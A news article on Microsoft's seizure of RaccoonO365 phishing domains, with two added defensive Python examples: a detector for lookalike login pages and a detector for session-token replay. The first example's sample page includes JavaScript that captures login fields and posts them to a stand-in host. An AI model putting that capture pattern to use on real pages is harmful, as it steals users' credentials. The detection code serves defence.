Microsoft Shuts Down Over 300 Websites Spreading RaccoonO365 Phishing Operation
Microsoft's Digital Crimes Unit (DCU) has obtained a court order from the U.S. District Court for the Southern District of New York and seized 338 domains used to run the RaccoonO365 phishing platform. The subscription-based service, active since mid-2024, has been used to harvest Microsoft 365 credentials at scale, affecting over 5,000 accounts across 94 countries as of September 2025.
RaccoonO365 replicates Microsoft branding, email templates, and login portals to trick recipients into entering usernames, passwords, and multi-factor authentication (MFA) codes. The harvesting mechanism relies on dynamic form injection and transparent redirection: a small JavaScript snippet captures the login form's input fields and forwards the values to the attacker's server, with the redirection meant to keep the victim from noticing that anything was intercepted.
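A quick check a responder can run on a suspected lookalike page is to find every place it could send form input and compare those targets against the hosts a genuine Microsoft 365 sign-in posts to. The script below is an added example, not code from Microsoft or from the RaccoonO365 kit: it parses a constructed lookalike page (the HTML, the hostnames and the trusted-host list are assumptions made for the demonstration) and reports each form action or inline-script URL that points outside the expected sign-in domains.

```python
"""Report where a captured login page sends the credentials it collects.

Added example, not Microsoft's code and not derived from RaccoonO365 samples.
It parses a constructed lookalike Microsoft 365 login page and lists every
submission target: <form action> URLs and URLs referenced from inline
<script> blocks (fetch/XMLHttpRequest). Targets outside TRUSTED_HOSTS are
flagged. The sample HTML and the hostnames in it are made up.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption for the example: hosts (and their subdomains) that a genuine
# Microsoft 365 sign-in flow is expected to post to.
TRUSTED_HOSTS = {"login.microsoftonline.com", "login.live.com", "login.microsoft.com"}

# Constructed lookalike page: Microsoft-styled form, but the data goes elsewhere.
SAMPLE_PAGE = """
<html><head><title>Sign in to your account</title></head>
<body>
<img src="https://logincdn.msauth.net/16.000/content/images/microsoft_logo.png">
<form id="login" action="https://m1cr0soft-login.example/collect.php" method="post">
  <input name="loginfmt" placeholder="Email, phone, or Skype">
  <input name="passwd" type="password">
  <input name="otc" placeholder="Enter code">
  <button type="submit">Sign in</button>
</form>
<script>
document.getElementById("login").addEventListener("submit", function (e) {
  e.preventDefault();
  var fields = {};
  document.querySelectorAll("input").forEach(function (i) { fields[i.name] = i.value; });
  fetch("https://cdn-sync.example/api/v1/save", {method: "POST", body: JSON.stringify(fields)})
    .then(function () { window.location = "https://login.microsoftonline.com/"; });
});
</script>
</body></html>
"""

URL_RE = re.compile(r"""["'](https?://[^"']+)["']""")


class SinkCollector(HTMLParser):
    """Collect form actions and absolute URLs referenced from inline scripts."""

    def __init__(self):
        super().__init__()
        self.sinks = []          # list of (kind, url)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.sinks.append(("form", a["action"]))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies are delivered here as raw text; pull out quoted URLs.
        if self._in_script:
            for url in URL_RE.findall(data):
                self.sinks.append(("script", url))


def is_trusted(url):
    """True if the URL's host is one of TRUSTED_HOSTS or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


def find_untrusted_sinks(html):
    """Return [(kind, url)] for every submission target outside TRUSTED_HOSTS."""
    parser = SinkCollector()
    parser.feed(html)
    return [(kind, url) for kind, url in parser.sinks if not is_trusted(url)]


if __name__ == "__main__":
    for kind, url in find_untrusted_sinks(SAMPLE_PAGE):
        print(f"{kind:6s} -> {url}")
```

On the constructed page this reports the form action and the `fetch` target; the redirect back to login.microsoftonline.com is trusted and is not listed. Real kits often load the capture script from a second domain or obfuscate the URLs, so treat a clean result as inconclusive and a flagged one as a strong signal.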
More capable operators also reuse captured session tokens and manipulate request headers to bypass MFA: a session cookie captured after the victim has completed the MFA step can be replayed by the attacker without triggering a fresh prompt. Not every stolen credential led to a network intrusion, but the impact on high-value sectors, healthcare in particular, was severe. At least 20 U.S. healthcare organizations reported delayed patient care, compromised lab results, and data breaches following successful RaccoonO365 phishing attempts.
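The replay step leaves a trace that defenders can look for: the victim's interactive, MFA-satisfied sign-in and the attacker's reuse of the same session show one session identifier from two different networks within minutes of each other. The detector below is an added example, not Microsoft code and not based on RaccoonO365 samples; it runs over constructed JSON-lines sign-in records whose field names (`session_id`, `mfa`, `kind`, and so on) are assumptions for the demonstration rather than a real Entra ID log schema.

```python
"""Flag session tokens reused from a different network shortly after the
MFA-satisfied sign-in that created them.

Added example, not Microsoft's code and not derived from RaccoonO365 samples.
The records and field names below are constructed for the demonstration.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress
import json

# Constructed sign-in records (JSON lines). S-1 is the attack pattern: the
# session created by an MFA-satisfied browser sign-in reappears two minutes
# later from another network with a scripting user agent.
SAMPLE_LOG = """
{"ts":"2025-09-10T08:01:10Z","user":"a.nurse@hospital.example","session_id":"S-1","ip":"203.0.113.7","ua":"Edge/128","mfa":"satisfied","kind":"interactive"}
{"ts":"2025-09-10T08:03:42Z","user":"a.nurse@hospital.example","session_id":"S-1","ip":"198.51.100.20","ua":"python-requests/2.32","mfa":"previously_satisfied","kind":"non_interactive"}
{"ts":"2025-09-10T08:30:00Z","user":"b.admin@hospital.example","session_id":"S-2","ip":"203.0.113.9","ua":"Chrome/129","mfa":"satisfied","kind":"interactive"}
{"ts":"2025-09-10T08:45:00Z","user":"b.admin@hospital.example","session_id":"S-2","ip":"203.0.113.9","ua":"Chrome/129","mfa":"previously_satisfied","kind":"non_interactive"}
{"ts":"2025-09-10T09:00:00Z","user":"c.user@hospital.example","session_id":"S-3","ip":"203.0.113.11","ua":"Firefox/130","mfa":"satisfied","kind":"interactive"}
{"ts":"2025-09-11T09:00:00Z","user":"c.user@hospital.example","session_id":"S-3","ip":"192.0.2.55","ua":"Firefox/130","mfa":"previously_satisfied","kind":"non_interactive"}
"""

# Reuse soon after the genuine sign-in is the proxy-phishing pattern; the
# window is a tuning assumption, not a fixed rule.
WINDOW = timedelta(minutes=30)


def parse(log_text):
    """Parse JSON lines into dicts with timezone-aware datetimes, oldest first."""
    events = [json.loads(line) for line in log_text.strip().splitlines()]
    for event in events:
        event["ts"] = datetime.fromisoformat(event["ts"].replace("Z", "+00:00"))
    return sorted(events, key=lambda event: event["ts"])


def same_network(ip_a, ip_b, prefix=24):
    """Treat two addresses in the same /24 as one network (demo assumption)."""
    net = ipaddress.ip_network(f"{ip_a}/{prefix}", strict=False)
    return ipaddress.ip_address(ip_b) in net


def find_token_replays(log_text, window=WINDOW):
    """Return one alert per session event that reuses an MFA-satisfied session
    from a different network within `window` of the originating sign-in."""
    by_session = defaultdict(list)
    for event in parse(log_text):
        by_session[event["session_id"]].append(event)

    alerts = []
    for sid, events in by_session.items():
        origin = next((e for e in events
                       if e["kind"] == "interactive" and e["mfa"] == "satisfied"), None)
        if origin is None:
            continue
        for event in events:
            if event is origin or event["ts"] < origin["ts"]:
                continue
            if event["ts"] - origin["ts"] > window:
                continue
            if same_network(origin["ip"], event["ip"]):
                continue
            alerts.append({
                "user": event["user"],
                "session_id": sid,
                "origin_ip": origin["ip"],
                "replay_ip": event["ip"],
                "seconds_after_signin": int((event["ts"] - origin["ts"]).total_seconds()),
                "ua_changed": event["ua"] != origin["ua"],
            })
    return alerts


if __name__ == "__main__":
    for alert in find_token_replays(SAMPLE_LOG):
        print(json.dumps(alert))
```

On the sample data only S-1 is flagged: S-2 is reused from the same network, and S-3 is reused from elsewhere but a day later, outside the window. In production the /24 heuristic should give way to ASN or named-location comparison, and a long-lived token reused from a new location (the S-3 case) deserves its own, lower-confidence rule rather than being dropped.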
Microsoft analysts have identified Joshua Ogundipe, a Nigerian developer, as the primary author of the RaccoonO365 phishing-as-a-service platform. Ogundipe operates a Telegram channel with over 850 members, advertising both standard phishing kits and a newly introduced 'AI-MailCheck' service designed to refine spear-phishing efficacy. Investigators traced over $100,000 in subscription payments to Ogundipe through an operational security lapse revealing a cryptocurrency wallet.
The seized domains served as both phishing hosts and command-and-control interfaces for subscription management, crippling the ability of subscribers to launch fresh attacks. Microsoft's partnership with Health-ISAC underlined the public safety implications, as stolen credentials often served as initial access points for subsequent malware or ransomware deployments.
RaccoonO365's rapid evolution underscores the need for layered defenses and user awareness. The platform now includes features that subvert MFA and automates credential harvesting at rates of up to 9,000 targets per day. The MFA codes it captures are one-time passcodes that a lookalike page can simply relay; phishing-resistant methods such as FIDO2 security keys and passkeys bind the credential to the genuine sign-in origin and cannot be relayed through a lookalike domain, and monitoring for session tokens used from unexpected locations catches the replay step. Individuals and organizations should treat these controls, rather than vigilance alone, as the baseline.